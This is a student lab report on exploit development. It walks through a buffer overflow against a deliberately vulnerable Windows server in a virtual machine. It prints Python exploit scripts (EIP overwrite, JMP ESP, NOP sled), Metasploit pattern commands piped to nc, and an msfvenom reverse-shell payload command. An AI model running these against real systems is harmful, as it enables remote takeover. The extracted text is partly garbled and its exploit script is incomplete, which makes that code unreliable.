This article discusses the process of exploit development and privilege escalations in ICT Ethical Hacking. It covers the phases of development, including initiation, overflow, and weaponizing the vulnerability. The article also provides insights into the shellcode and references for further reading.
Contribute Materials
Your contribution can guide someone’s learning journey. Share your
documents today.
Running head:ICT ETHICAL HACKING ICT Ethical Hacking Name of the Student Name of the University Author Note
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
1ICT ETHICAL HACKING To gain control over a computer system, exploit development is used. This is done during the findings of bugs and vulnerabilities and taking advantages. Therefore, the process allows privilege escalations and service denial attacks (Thomas, Burmeister & Low, 2017). The entire process for the development thus requires several phases, which follows the process in such a way that the previous phase needs to be completed first in order to process further to the next one. Initiation phase:Linux Platform is utilized for the development process entirely. The Kali Virtual Machine needs to be accessed first following by the Win32 buffer victim Virtual Machine (Wang & Yang, 2017). During this process, the IP addresses of both the machines are required to be checked by setting up a NAT networking. Overflow: #!/usr/bin/python import sys import os import socket host = sys.argv[1] port = int(sys.argv[2]) port = int(sys.argv[2])
2ICT ETHICAL HACKING # Testing buffer = "\x41"*500 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) con = s.connect((host, port)) s.send(buffer) s.close() The server.exe is opened immediately along with an immediate debugger in the Windows host. The F9 key then initiates the entire process for execution. Following these, a python file has been created with the name ‘attack.py’. In this file, python codes have also been attached. Along with these, the python command “python attack.py IP_ADDRESS 1337” is attached (Sinha, 2017). The IP addresses of the machines have been set alike as the Windows Virtual Machine. After this process has been executed, it is required that now the Windows environment be swapped and the shift key and F9 key is to be pressed at the same time to pass the executable exception.
3ICT ETHICAL HACKING Now, from the above figure, we can see that the EIP and the EBP contains the required value. The ESP value generated in the process instructs towards thr memory containing the injected value. Weaponizing the vulnerability: This phase can be described by the pressing of CTRL and F2 key at once and restarting of the server.exe within the range of the immunity debugger. This was followed by the initiation of the execution process by pressing F9 (Li et al., 2018). With the process of running the runningcd /usr/share/metasploit-framework/tools/exploit.Run./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337within Kali, the directory needs to be changed to metasploit. This is how the IP addressed for both the Windows Virtual Machine and the physical machine are matched. ThenpressSHIFT+F9withinImmunitydebuggertopasstheexception.Run “./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. The code which will jump to the ESP needs to be determined now. The attack.py modified as follows: #!/usr/bin/python import sys
Paraphrase This Document
Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
4ICT ETHICAL HACKING importos import socket host = sys.argv[1] port = int(sys.argv[2]) # EIP is overwritten at 260 bytes buffer = "\x41"*260 # Overwrite EIP with JMP ESP buffer += "\x78\x16\xF3\x77" # NOPSLED buffer += "\x90"*128 # Shellcode buffer +=
5ICT ETHICAL HACKING s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) con = s.connect((host, port)) s.send(buffer) s.close() Shellcode 1.Enter Kali. 2.Run the commandmsfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f pythonwhere <KALI_IP> is the IP address of the Kali virtual machine. 3.Modify the attack.py file to include the generated shellcode.
6ICT ETHICAL HACKING References Li, L., Li, Z., Shahriar, H., Rutherfoord, R., Peltsverger, S., & Tatum, D. (2018). Ethical Hacking: Network Security and Penetration Testing. Sinha, S. (2017). Python 3 and Ethical Hacking. InBeginning Ethical Hacking with Python(pp. 37-38). Apress, Berkeley, CA. Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking. InProceedingsofThe28thAustralasianConferenceonInformationSystems, December(pp. 4-6). Wang, Y., & Yang, J. (2017, March). Ethical Hacking and Network Defense: Choose Your Best NetworkVulnerabilityScanningTool.InAdvancedInformationNetworkingand Applications Workshops (WAINA), 2017 31st International Conference on(pp. 110-113). IEEE.